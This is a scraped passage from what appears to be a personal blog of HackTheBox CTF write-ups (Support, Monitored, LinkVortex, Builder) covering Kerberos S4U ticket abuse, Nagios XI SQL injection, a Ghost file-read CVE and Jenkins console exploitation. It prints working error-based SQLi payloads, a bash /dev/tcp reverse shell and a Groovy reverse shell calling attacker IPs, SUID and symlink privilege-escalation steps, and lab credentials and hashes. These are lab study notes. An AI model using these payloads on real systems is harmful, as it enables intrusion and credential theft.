GmuvuqltEDAYbJhHj7+gE5qyFtobKrwWR7w0oicFFNfiseE8sBnumzPg4oAcF2u4PvJ3o4HcMIHZoAMC AQCigdEEgc59gcswgciggcUwgcIwgb+gGzAZoAMCARehEgQQ+OBkvOYnOKmidbObbW7RI6ENGwtTVVBQ T1JULkhUQqIeMBygAwIBAaEVMBMbETB4ZGZGYWtlQ29tcHV0ZXIkowcDBQBA4QAApREYDzIwMjYwMjI1 MTE0OTI4WqYRGA8yMDI2MDIyNTIxNDkyOFqnERgPMjAyNjAzMDQxMTQ5MjhaqA0bC1NVUFBPUlQuSFRC qSAwHqADAgECoRcwFRsGa3JidGd0GwtzdXBwb3J0Lmh0Yg== [*] Action: S4U [*] Building S4U2self request for: \u0026#39;0xdfFakeComputer$@SUPPORT.HTB\u0026#39; [*] Using domain controller: dc.support.htb (::1) [*] Sending S4U2self request to ::1:88 [+] S4U2self success! [*] Got a TGS for \u0026#39;administrator\u0026#39; to \u0026#39;0xdfFakeComputer$@SUPPORT.HTB\u0026#39; [*] base64(ticket.kirbi): doIFtjCCBbKgAwIBBaEDAgEWooIEyzCCBMdhggTDMIIEv6ADAgEFoQ0bC1NVUFBPUlQuSFRCoh4wHKAD AgEBoRUwExsRMHhkZkZha2VDb21wdXRlciSjggSHMIIEg6ADAgEXoQMCAQGiggR1BIIEcZk0rBmQW9bW Xwsn96yPWwvhC6/KCLoMqvP3wLmzhdsgcRYYe0dcEaVrDszeU8XTJKdHUCQQibftJQCM3VnP0cTe1YJL VWKNZe20K6uGVBIAu9C1kmA+tGZx6VpYyDOSZ/G7Lhp/mEXq7oOj6Pe4eoZZaotL0/0/6OrndGn6dXvp hozx+ReGLCMiu4U5HWSsBn460FlqUWHZk0MnwMiD7i68RHlBHmLdkblvL584jSC6OZ7xh7P28+E5KqId iDDMjUFRrm8Nnqz+e/lsXzP14jcvz3QnMlo9vJQ8atrRN9uMp1yhor/ME9Yz5RJAzDJDmbg6LZcBNOQD VbvLkRhvjVpRDQPwhlJHZxzvdpamQ3N4BajqcAcugsCxUlr4yyl50Km74VI2XpoZ5rzNkSjfRjy0rCk0 FAeAgX+3rE0cg2NHQiRCAdGPTZEE+8VY6//iLwFdxzKCTA+RmUrkLbBknPMDDTRS1VslWueE44o0l1+W ZkjMrWs3iGdtdfRhDBsj33/ZfBaXhnzrOjlQPacIJtRvt4NsIDgetu/bwZwengQDwUxUG/QIWczeOLLZ 5ox9A1Wycne9z8+gdUeeR2kcxYMlVgSQH0Xn+M0J2E+CfQzK8CKJV1L5g7u8ZNYZ1k9LERJ9JLrvN4Hg 3rA9iBCgYiCnjW1FpquzCsn+PPRpujJ6fiCChd5U6CVY6WlfIF0I6ZDfWGJ5sPAZC8z+Mi281IG5OE0m u4U4QTgJqTtnTnAflncvJQ7K8eqeYYhkaqIRe/Ah7rSb8D46d4xORYSy/yTpjmWiYfV4fXDfFvt2Kr+9 98JfBHJBuQ/v9dB1Ggisb+dWOakvgSPCXcUPiLjDKnODTY1ZsXF8xlHe8cJMuPH+VZqQGsOtxP9yGdAE lVQOh+/mB/TXLjiuPaLuQS9lI8SD2dOlqFpkRVOUm1xohabuhyR/8cSYW3JfAORqzdPqj3u2LidfbzQj R6ncSk98jYOwtD0zDltWbPC4CRTkgs2FtinfYT+TkhzJhJOhzKlvZFDsM08OcFbNRL7vbpEyeAnd1SQP itc0EtLhI2D+6IRp/9Aa72R+GQxaUSRMAjWxBsNnFV6KSKIGU6gFrakZJFwGmhlbLuUvPt34zpgFeDS/ TGbjz5Zz9ZBwQyV0Jgy2v1Osc76vncYDD+wz9RqkrNKcAZZ5a7H5VyfWT271JuLalWQrZbOw4vptqBGh bp1zRGuBmcG/P3Hdb/oadH9AYFGZ6tqv46ngl/vaahSUKVEh1KGI0b99okjjJEaee2is+B5DGAa8A6Cf cxwgc+5Ikbc4E0J6k2pZxN030Ol/ErUq5y44GpFRfHXEGb5v+a2OdqLPfqB4mrgM5BvCr+xdRrzJX6FD PZVm99gYu8zYUGXTTFcTwGC58wX1DOHXbeh1b2mDsYfgAPbsoaA72oCn1c61W1vVOikWpt9P3vbtB7OO Ix+BvO2nVaDW8KH+6VFizPqdVqiurQujIa5nJhYCgTP3oqsRY9sneT3vBOlWm4n7gaOB1jCB06ADAgEA ooHLBIHIfYHFMIHCoIG/MIG8MIG5oBswGaADAgEXoRIEELg9Z4UKVkODw7JfCn7XV2WhDRsLU1VQUE9S VC5IVEKiGjAYoAMCAQqhETAPGw1hZG1pbmlzdHJhdG9yowcDBQBAoQAApREYDzIwMjYwMjI1MTE0OTI5 WqYRGA8yMDI2MDIyNTIxNDkyOFqnERgPMjAyNjAzMDQxMTQ5MjhaqA0bC1NVUFBPUlQuSFRCqR4wHKAD AgEBoRUwExsRMHhkZkZha2VDb21wdXRlciQ= [*] Impersonating user \u0026#39;administrator\u0026#39; to target SPN \u0026#39;cifs/dc.support.htb\u0026#39; [*] Building S4U2proxy request for service: \u0026#39;cifs/dc.support.htb\u0026#39; [*] Using domain controller: dc.support.htb (::1) [*] Sending S4U2proxy request to domain controller ::1:88 [+] S4U2proxy success! [*] base64(ticket.kirbi) for SPN \u0026#39;cifs/dc.support.htb\u0026#39;: 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 I’ll grab the last ticket Rubeus generated, and copy it back to my machine, saving it as ticket.kirbi.b64, making sure to remove all spaces. I’ll base64 decode it into ticket.kirbi:\n:%s/ //g base64 -d ticket.kirbi.b64 \u0026gt; ticket.kirbi /home/kali/Desktop/Tools/ACTIVEDIRECTORY/ticketConverter.py ticket.kirbi ticket.ccache KRB5CCNAME=ticket.ccache \u0026#34;/home/kali/Desktop/Tools/ACTIVEDIRECTORY/psexec.py\u0026#34; support.htb/administrator@dc.support.htb -k -no-pass or impacket-psexec ","date":"23 February 2026","externalUrl":null,"permalink":"/ctf-writeups/support/","section":"CTF Writeups","summary":"","title":"Support","type":"ctf-writeups"},{"content":" Monitored # Overview # OS: Linux IP: 10.10.10.10 Difficulty: Medium Platform: HackTheBox OSCP: Yes Lists: N/A Summary # found creds from snmpwalk, api logic for getting a page, api logic for creating user, ran check fgrom monitoring service to get the shell, privesc thru sudo-l.\nLoot # Loot Category Details Usernames root@monitored.htb, svc Passwords XjH7VCehowpR1xZB Usernames+Passwords svc/XjH7VCehowpR1xZB Hashes Service Versions Nagios XI 5.11 API key nagiosadmin IudGPHd9pEKiee9MkJ7ggPD89q3YndctnPeRQOmS2PQ7QIrbJEomFVG6Eut9CHLL |\nEnumeration # Nmap # Not shown: 980 closed tcp ports (reset) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0) | ssh-hostkey: | 3072 61:e2:e7:b4:1b:5d:46:dc:3b:2f:91:38:e6:6d:c5:ff (RSA) | 256 29:73:c5:a5:8d:aa:3f:60:a9:4a:a3:e5:9f:67:5c:93 (ECDSA) |_ 256 6d:7a:f9:eb:8e:45:c2:02:6a:d5:8d:4d:b3:a3:37:6f (ED25519) 80/tcp open http Apache httpd 2.4.56 |_http-title: Did not follow redirect to https://nagios.monitored.htb/ |_http-server-header: Apache/2.4.56 (Debian) 89/tcp filtered su-mit-tg 139/tcp filtered netbios-ssn 212/tcp filtered anet 389/tcp open ldap OpenLDAP 2.2.X - 2.3.X 443/tcp open ssl/https Apache/2.4.56 (Debian) | tls-alpn: |_ http/1.1 | ssl-cert: Subject: commonName=nagios.monitored.htb/organizationName=Monitored/stateOrProvinceName=Dorset/countryName=UK | Not valid before: 2023-11-11T21:46:55 |_Not valid after: 2297-08-25T21:46:55 |_http-title: Nagios XI |_ssl-date: TLS randomness does not represent time |_http-server-header: Apache/2.4.56 (Debian) 541/tcp filtered uucp-rlogin 625/tcp filtered apple-xsrvr-admin 705/tcp filtered agentx 1034/tcp filtered zincite-a 1062/tcp filtered veracity 1123/tcp filtered murray 1296/tcp filtered dproxy 5822/tcp filtered unknown 6100/tcp filtered synchronet-db 6667/tcp filtered irc 8002/tcp filtered teradataordbms 9618/tcp filtered condor 16001/tcp filtered fmsascon Device type: general purpose|router Running: Linux 5.X, MikroTik RouterOS 7.X OS CPE: cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3 OS details: Linux 5.0 - 5.14, MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3) Network Distance: 2 hops Service Info: Host: nagios.monitored.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel Dirbusting # Nothing useful Nmap —\u0026gt; Nagios subdomain # └─$ nmap nagios.monitored.htb -sU --min-rate=20000 Starting Nmap 7.95 ( https://nmap.org ) at 2026-02-22 07:06 EST Nmap scan report for nagios.monitored.htb (10.129.230.96) Host is up (0.17s latency). rDNS record for 10.129.230.96: monitored.htb Not shown: 994 open|filtered udp ports (no-response) PORT STATE SERVICE 123/udp open ntp **161/udp open snmp** 18807/udp closed unknown 21625/udp closed unknown 25003/udp closed icl-twobase4 49169/udp closed unknown 2/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0) | ssh-hostkey: | 3072 61:e2:e7:b4:1b:5d:46:dc:3b:2f:91:38:e6:6d:c5:ff (RSA) | 256 29:73:c5:a5:8d:aa:3f:60:a9:4a:a3:e5:9f:67:5c:93 (ECDSA) |_ 256 6d:7a:f9:eb:8e:45:c2:02:6a:d5:8d:4d:b3:a3:37:6f (ED25519) 80/tcp open http Apache httpd 2.4.56 |_http-title: Did not follow redirect to https://nagios.monitored.htb |_http-server-header: Apache/2.4.56 (Debian) **389/tcp open ldap OpenLDAP 2.2.X - 2.3.X** 443/tcp open ssl/http Apache httpd 2.4.56 |_ssl-date: TLS randomness does not represent time |_http-server-header: Apache/2.4.56 (Debian) | tls-alpn: |_ http/1.1 |_http-title: Nagios XI | ssl-cert: Subject: commonName=nagios.monitored.htb/organizationName=Monitored/stateOrProvinceName=Dorset/countryName=UK | Not valid before: 2023-11-11T21:46:55 |_Not valid after: 2297-08-25T21:46:55 Device type: general purpose|router Running: Linux 5.X, MikroTik RouterOS 7.X OS CPE: cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3 OS details: Linux 5.0 - 5.14, MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3) Network Distance: 2 hops Service Info: Hosts: nagios.monitored.htb, 127.0.0.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel LDAP # └─$ ldapsearch -H ldap://nagios.monitored.htb -x -s base namingcontexts ## extended LDIF # ## LDAPv3 ## base \u0026lt;\u0026gt; (default) with scope baseObject ## filter: (objectclass=*) ## requesting: namingcontexts # # dn: namingContexts: dc=monitored,dc=htb ## search result search: 2 result: 0 Success ====================================================================================== ## numResponses: 2 ## numEntries: 1 ldapsearch -x -H ldap://10.129.230.96 -b \u0026#34;dc=monitored,dc=htb\u0026#34; \u0026#34;(objectClass=*)\u0026#34; ## extended LDIF # ## LDAPv3 ## base \u0026lt;dc=monitored,dc=htb\u0026gt; with scope subtree ## filter: (objectClass=*) ## requesting: ALL # ## monitored.htb dn: dc=monitored,dc=htb objectClass: top objectClass: dcObject objectClass: organization o: monitored.htb dc: monitored ## search result search: 2 result: 0 Success ## numResponses: 2 ## numEntries: 1 SMP # lets do a smpwalk\n└─$ snmpwalk -v2c -c public 10.129.230.96 iso.3.6.1.2.1.1.1.0 = STRING: \u0026#34;Linux monitored 5.10.0-28-amd64 #1 SMP Debian 5.10.209-2 (2024-01-31) x86_64\u0026#34; iso.3.6.1.2.1.1.2.0 = OID: iso.3.6.1.4.1.8072.3.2.10 iso.3.6.1.2.1.1.3.0 = Timeticks: (253220) 0:42:12.20 iso.3.6.1.2.1.1.4.0 = STRING: \u0026#34;Me \u0026lt;root@monitored.htb\u0026gt;\u0026#34; iso.3.6.1.2.1.1.5.0 = STRING: \u0026#34;monitored\u0026#34; iso.3.6.1.2.1.1.6.0 = STRING: \u0026#34;Sitting on the Dock of the Bay\u0026#34; iso.3.6.1.2.1.1.7.0 = INTEGER: 72 iso.3.6.1.2.1.1.8.0 = Timeticks: (271) 0:00:02.71 iso.3.6.1.2.1.1.9.1.2.1 = OID: iso.3.6.1.6.3.10.3.1.1 iso.3.6.1.2.1.1.9.1.2.2 = OID: iso.3.6.1.6.3.11.3.1.1 .... iso.3.6.1.2.1.25.4.2.1.5.588 = \u0026#34;\u0026#34; iso.3.6.1.2.1.25.4.2.1.5.590 = STRING: \u0026#34;-u -s -O /run/wpa_supplicant\u0026#34; iso.3.6.1.2.1.25.4.2.1.5.597 = STRING: \u0026#34;-f\u0026#34; iso.3.6.1.2.1.25.4.2.1.5.621 = STRING: \u0026#34;-c sleep 30; sudo -u svc /bin/bash -c /opt/scripts/check_host.sh svc XjH7VCehowpR1xZB \u0026#34; iso.3.6.1.2.1.25.4.2.1.5.739 = STRING: \u0026#34;-f /usr/local/nagios/etc/pnp/npcd.cfg\u0026#34; iso.3.6.1.2.1.25.4.2.1.5.745 = STRING: \u0026#34;-LOw -f -p /run/snmptrapd.pid\u0026#34; iso.3.6.1.2.1.25.4.2.1.5.752 = STRING: \u0026#34;-LOw -u Debian-snmp -g Debian-snmp -I -smux mteTrigger mteTriggerConf -f -p /run/snmpd.pi this could be a potential account so lets add it to our loot, svc/XjH7VCehowpR1xZB\nPort 80 # Homepage # ok so nagios is apparently an industry-standard, open-source IT infrastructure monitoring tool designed to monitor servers, networks, applications, and services. It proactively checks system health (CPU, memory, disk, traffic) and sends alerts via email or SMS when failures occur, allowing IT teams to resolve issues before they affect business processes.\nlogin.php # Exploitation # So now that we got the creds for svc, they dont seem to work on the portal because of some user disabled error, lets check if there is any api endpoint we can try to get into ( had to refer to ippsec for this)\n/nagiosxi/api/v1/authenticate # and on giving our token boom we r in\nNagios XI 5.11 (SQLi) # On searching this version we find this sqli blog\nCVE-2023-40933: Nagios XI SQL Injection Vulnerability\nA SQL injection vulnerability in Nagios XI v5.11.1 and below allows authenticated attackers with announcement banner configuration privileges to execute arbitrary SQL commands via the ID parameter sent to the update_banner_message() function\nhttps://rootsecdev.medium.com/notes-from-the-field-exploiting-nagios-xi-sql-injection-cve-2023-40931-9d5dd6563f8c\nlets do the sqli manually following ippsec\nit is Error Based\nPATH injection\naction=acknowledge_banner_message\u0026amp;id=1 AND EXTRACTVALUE(1, (select SCHEMA_NAME from INFORMATION_SCHEMA.SCHEMATA)) --\u0026gt; should return more than 1 row action=acknowledge_banner_message\u0026amp;id=1 AND EXTRACTVALUE(1, (select group_concat(SCHEMA_NAME) from INFORMATION_SCHEMA.SCHEMATA)) --\u0026gt; should return more than 1 row Databases action=acknowledge_banner_message\u0026amp;id=4 AND EXTRACTVALUE(1, concat(0x0a, (select group_concat(SCHEMA_NAME) from INFORMATION_SCHEMA.SCHEMATA))) --\u0026gt; should return more than 1 ro Table COLUMNS action=acknowledge_banner_message\u0026amp;id=4 AND EXTRACTVALUE(1, concat(0x0a, (select group_concat(TABLE_NAME,COLUMN_NAME) from INFORMATION_SCHEMA.COLUMNS where TABLE_SCHEMA = \u0026#39;nagiosxi\u0026#39;))) Table NAME action=acknowledge_banner_message\u0026amp;id=4 AND EXTRACTVALUE(1, concat(0x0a, (select TABLE_NAME from INFORMATION_SCHEMA.TABLES where TABLE_SCHEMA = \u0026#39;nagiosxi\u0026#39; LIMIT $0$,1))) action=acknowledge_banner_message\u0026amp;id=4 AND EXTRACTVALUE(1, concat(0x0a, (select COLUMN_NAME from INFORMATION_SCHEMA.COLUMNS where TABLE_SCHEMA = \u0026#39;nagiosxi\u0026#39; and TABLE_NAME = \u0026#39;xi_users\u0026#39; LIMIT 0,1)) ) Data enum action=acknowledge_banner_message\u0026amp;id=4 AND EXTRACTVALUE(1, concat(0x0a, (select username from xi_users where LIMIT 0,1))) --\u0026gt; nagios ADMIN action=acknowledge_banner_message\u0026amp;id=4 AND EXTRACTVALUE(1, concat(0x0a, (select substring(api_key,1,28) from xi_users LIMIT 0,1))) --\u0026gt; nagios ADMIN action=acknowledge_banner_message\u0026amp;id=4 AND EXTRACTVALUE(1, concat(0x0a, (select substring(api_key,29,56) from xi_users LIMIT 0,1))) --\u0026gt; nagios ADMIN action=acknowledge_banner_message\u0026amp;id=4 AND EXTRACTVALUE(1, concat(0x0a, (select substring(api_key,57,70) from xi_users LIMIT 0,1))) --\u0026gt; nagios ADMIN Now we just register ourselves with the api key we got\nRev Shell # Easiest way in these monitoring services is to run a check that we manipulate\nnow lets run it\nDoes not seem to work, found out that i forget to exec as in it shud have been\n[nagios@monitored ~]$ bash -c \u0026#39;bash -i \u0026gt;\u0026amp; /dev/tcp/10.10.14.66/1234 0\u0026gt;\u0026amp;1\u0026#39; Shell as nagios # i didnt really understand the privesc part of this, will check it later\nmv nagios nagios.bk x.sh #!/bin/bash cp /bin/bash /tmp/0xdf chown root:root /tmp/0xdf chmod 6777 /tmp/0xdf cp /tmp/x.sh nagios chmod +x nagios sudo /usr/local/nagiosxi/scripts/manage_services.sh restart nagios ls -la /tmp/0xdf /tmp/0xdf -p ","date":"22 February 2026","externalUrl":null,"permalink":"/ctf-writeups/monitored/","section":"CTF Writeups","summary":"","title":"Monitored","type":"ctf-writeups"},{"content":"","date":"21 February 2026","externalUrl":null,"permalink":"/tags/lains-list/","section":"Tags","summary":"","title":"Lains-List","type":"tags"},{"content":" LinkVortex # Overview # OS: Linux IP: 10.129.231.194 Difficulty: Easy Platform: HackTheBox OSCP: Yes Lists: TJNull, Lain\u0026rsquo;s List Summary # Enumeration uncovered a DEV subdomain exposing a .git directory. Dumping the repository revealed valid Ghost CMS credentials, which gave authenticated access to the admin panel. Since the target was running Ghost 5.58, I used CVE-2023-40028 to read sensitive files and recover credentials for another user. From there, I logged in as bob over SSH and abused a vulnerable sudo symlink-cleaning script to read root-owned files.\nLoot # Category Details Usernames admin@linkvortex.htb, bob@linkvortex.htb Passwords OctopiFociPilfer45, thisissupersafe, fibber-talented-worth Credentials admin@linkvortex.htb:OctopiFociPilfer45, bob@linkvortex.htb:fibber-talented-worth Service Versions Ghost 5.58 Enumeration # Nmap # Starting Nmap 7.95 ( https://nmap.org ) at 2026-02-21 07:40 EST ... Dirbusting # 301 GET ... ... Web (Port 80) # Homepage # The web root looked like a normal blog-style site at first glance. Nothing obvious was exposed here, but it strongly suggested a CMS-backed application.\nCMS Detection # Further checks confirmed the backend was Ghost CMS, which is important because version-specific Ghost vulns are well documented.\nRobots.txt # User-agent: * Disallow: /ghost/ The /ghost/ path is the Ghost admin endpoint, so this was a direct lead.\nGhost Admin Panel # Browsing to /ghost/ reached the login portal.\nRSS Feed # The RSS data confirmed the instance was running Ghost 5.58, a vulnerable version for authenticated arbitrary file read.\nSubdomain Discovery # A new subdomain was identified during enumeration. Since it was not publicly resolvable, it was added to /etc/hosts for direct interaction.\nDEV Subdomain # The DEV host expanded the attack surface and quickly became the more interesting target.\n.git Exposure # The DEV site exposed a .git directory. That usually means source history leakage and potential credential disclosure.\nThe repository was dumped using gitdumper for offline review.\nGit Analysis # Commit history exposed a password update:\n- password = \u0026#39;thisissupersafe\u0026#39; + password = \u0026#39;OctopiFociPilfer45\u0026#39; This gave valid Ghost admin credentials.\nExploitation # Ghost 5.58 - Arbitrary File Read (CVE-2023-40028) # The target version was vulnerable to authenticated file read:\nhttps://github.com/0xDTC/Ghost-5.58-Arbitrary-File-Read-CVE-2023-40028\nExploit Execution # ./CVE-2023-40028 -u admin@linkvortex.htb -p OctopiFociPilfer45 -h http://linkvortex.htb/ This confirmed arbitrary file read worked with the recovered admin credentials.\nReading System Files # /etc/passwd Reading /etc/passwd validated file access on the target.\nExtracting Credentials # /var/lib/ghost/config.production.json Recovered credentials:\nbob@linkvortex.htb fibber-talented-worth SSH Access # ssh bob@linkvortex.htb Using the credentials from config.production.json, I gained a shell as bob.\nPrivilege Escalation # Sudo Permissions # (ALL) NOPASSWD: /usr/bin/bash /opt/ghost/clean_symlink.sh *.png Vulnerability # clean_symlink.sh did not safely validate symlink targets, making it possible to pivot a permitted .png path into protected files.\nExploit # ln -s /root/root.txt /home/bob/.cache/b ln -s /home/bob/.cache/b /home/bob/.cache/a.png CHECK_CONTENT=true sudo bash /opt/ghost/clean_symlink.sh /home/bob/.cache/a.png This abuse chain allowed reading root-owned content through the allowed sudo command.\nRoot Access # Key Takeaways # Exposed .git repositories can leak sensitive credentials via commit history. Old credentials can remain visible even after password rotations. Ghost 5.58 is vulnerable to authenticated arbitrary file read (CVE-2023-40028). Application config files often contain high-value credentials. Poor symlink handling in sudo-allowed scripts can lead to privilege escalation. ","date":"21 February 2026","externalUrl":null,"permalink":"/ctf-writeups/linkvortex/","section":"CTF Writeups","summary":"","title":"LinkVortex","type":"ctf-writeups"},{"content":"","date":"21 February 2026","externalUrl":null,"permalink":"/tags/tjnull/","section":"Tags","summary":"","title":"Tjnull","type":"tags"},{"content":" Builder # Overview # OS: Linux IP: 10.129.230.220 Difficulty: Medium Platform: HackTheBox OSCP: Yes Lists: N/A Summary # old jenkins interface got creds with hydra and LFI that exposed creds under users.xml, grabbed root ssh key and decrypted it with the CLI.\nLoot # Takeaways Category Details Usernames+Passwords jennifer:princess Hashes jennifer #jbcrypt:$2a$10$UwR7BpEH.ccfpi1tv6w/XuBtS44S7oUpR2JYiobqxcDQJeN/L4l1a |\nEnumeration # I started broad, validated each finding, and then focused only on paths that were reproducible.\nnmap dirb sub 80 Exploitation # using the LFI we found\nim clueless, i know there is a user called jennifer but idk the name of the file that contains the password ahh let me check with gpt if not i mighthave to refer to the writeup\nok so lets check the users.xml file\njennifer_12108429903186576833\nthere is this, lets check the directory under and view the config xml for the hash\nwe get princess as the password\nalternatively we could have just used hydra\nOR\nburp\nanyways now that we are in lets look for where we can upload our reverse shell\nhttps://blog.pentesteracademy.com/abusing-jenkins-groovy-script-console-to-get-shell-98b951fa64a6\nusing this blog we will try to get\nString host=\u0026#34;10.10.15.208\u0026#34;; int port=8044; String cmd=\u0026#34;/bin/bash\u0026#34;; Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()\u0026gt;0)so.write(pi.read());while(pe.available()\u0026gt;0)so.write(pe.read());while(si.available()\u0026gt;0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close(); and we have our shell\non searching we find this on stack overflow\ninteresting lets check the source and see if we can get\n{AQAAABAAAAowLrfCrZx9baWliwrtCiwCyztaYVoYdkPrn5qEEYDqj5frZLuo4qcqH61hjEUdZtkPiX6buY1J4YKYFziwyFA1wH/X5XHjUb8lUYkf/XSuDhR5tIpVWwkk7l1FTYwQQl/i5MOTww3b1QNzIAIv41KLKDgsq4WUAS5RBt4OZ7v410VZgdVDDciihmdDmqdsiGUOFubePU9a4tQoED2uUHAWbPlduIXaAfDs77evLh98/INI8o/A+rlX6ehT0K40cD3NBEF/4Adl6BOQ/NSWquI5xTmmEBi3NqpWWttJl1q9soOzFV0C4mhQiGIYr8TPDbpdRfsgjGNKTzIpjPPmRr+j5ym5noOP/LVw09+AoEYvzrVKlN7MWYOoUSqD+C9iXGxTgxSLWdIeCALzz9GHuN7a1tYIClFHT1WQpa42EqfqcoB12dkP74EQ8JL4RrxgjgEVeD4stcmtUOFqXU/gezb/oh0Rko9tumajwLpQrLxbAycC6xgOuk/leKf1gkDOEmraO7uiy2QBIihQbMKt5Ls+l+FLlqlcY4lPD+3Qwki5UfNHxQckFVWJQA0zfGvkRpyew2K6OSoLjpnSrwUWCx/hMGtvvoHApudWsGz4esi3kfkJ+I/j4MbLCakYjfDRLVtrHXgzWkZG/Ao+7qFdcQbimVgROrncCwy1dwU5wtUEeyTlFRbjxXtIwrYIx94+0thX8n74WI1HO/3rix6a4FcUROyjRE9m//dGnigKtdFdIjqkGkK0PNCFpcgw9KcafUyLe4lXksAjf/MU4v1yqbhX0Fl4Q3u2IWTKl+xv2FUUmXxOEzAQ2KtXvcyQLA9BXmqC0VWKNpqw1GAfQWKPen8g/zYT7TFA9kpYlAzjsf6Lrk4Cflaa9xR7l4pSgvBJYOeuQ8x2Xfh+AitJ6AMO7K8o36iwQVZ8+p/I7IGPDQHHMZvobRBZ92QGPcq0BDqUpPQqmRMZc3wN63vCMxzABeqqg9QO2J6jqlKUgpuzHD27L9REOfYbsi/uM3ELI7NdO90DmrBNp2y0AmOBxOc9e9OrOoc+Tx2K0JlEPIJSCBBOm0kMr5H4EXQsu9CvTSb/Gd3xmrk+rCFJx3UJ6yzjcmAHBNIolWvSxSi7wZrQl4OWuxagsG10YbxHzjqgoKTaOVSv0mtiiltO/NSOrucozJFUCp7p8v73ywR6tTuR6kmyTGjhKqAKoybMWq4geDOM/6nMTJP1Z9mA+778Wgc7EYpwJQlmKnrk0bfO8rEdhrrJoJ7a4No2FDridFt68HNqAATBnoZrlCzELhvCicvLgNur+ZhjEqDnsIW94bL5hRWANdV4YzBtFxCW29LJ6/LtTSw9LE2to3i1sexiLP8y9FxamoWPWRDxgn9lv9ktcoMhmA72icQAFfWNSpieB8Y7TQOYBhcxpS2M3mRJtzUbe4Wx+MjrJLbZSsf/Z1bxETbd4dh4ub7QWNcVxLZWPvTGix+JClnn/oiMeFHOFazmYLjJG6pTUstU6PJXu3t4Yktg8Z6tk8ev9QVoPNq/XmZY2h5MgCoc/T0D6